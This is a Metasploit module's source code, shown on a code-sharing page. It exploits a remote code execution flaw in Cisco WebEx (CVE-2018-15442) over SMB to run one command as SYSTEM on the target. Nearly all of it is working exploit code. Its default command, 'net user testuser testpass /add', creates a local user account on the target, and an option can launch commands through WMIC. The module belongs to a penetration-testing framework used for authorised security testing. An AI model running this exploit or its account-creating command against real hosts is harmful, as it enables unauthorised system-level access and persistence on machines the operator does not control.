Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/smb/webexec_command.rb
19516 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::SMB::Client::WebExec

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::Scanner

10


11
  # Aliases for common classes

12
  SIMPLE = Rex::Proto::SMB::SimpleClient

13
  XCEPT = Rex::Proto::SMB::Exceptions

14
  CONST = Rex::Proto::SMB::Constants

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'WebEx Remote Command Execution Utility',

21
        'Description' => %q{

22
          This module enables the execution of a single command as System by exploiting a remote

23
          code execution vulnerability in Cisco's WebEx client software.

24
        },

25


26
        'Author' => [

27
          'Ron Bowes <[email protected]>',

28
        ],

29


30
        'License' => MSF_LICENSE,

31
        'References' => [

32
          ['URL', 'https://webexec.org'],

33
          ['CVE', '2018-15442']

34
        ],

35
        'Notes' => {

36
          'Stability' => [CRASH_SAFE],

37
          'SideEffects' => [IOC_IN_LOGS],

38
          'Reliability' => []

39
        }

40
      )

41
    )

42


43
    register_options([

44
      OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net user testuser testpass /add']),

45
      OptPort.new('RPORT', [true, 'The Target port', 445]),

46
      OptBool.new('FORCE_GUI', [true, 'Ensure a GUI is created via wmic', false]),

47
    ])

48
  end

49


50
  # This is the main control method

51
  def run_host(ip)

52
    @smbshare = datastore['SMBSHARE']

53
    @ip = ip

54


55
    # Try and authenticate with given credentials

56
    if connect

57
      begin

58
        smb_login

59
      rescue Rex::Proto::SMB::Exceptions::Error => e

60
        print_error("Unable to authenticate with given credentials: #{e}")

61
        return

62
      end

63


64
      command = datastore['COMMAND']

65
      if datastore['FORCE_GUI']

66
        command = "WMIC PROCESS CALL Create \"#{command}\""

67
      end

68


69
      wexec(true) do |opts|

70
        execute_single_command(command, opts)

71
      end

72


73
      print_good('Command completed!')

74
      disconnect

75
    end

76
  end

77
end

78


79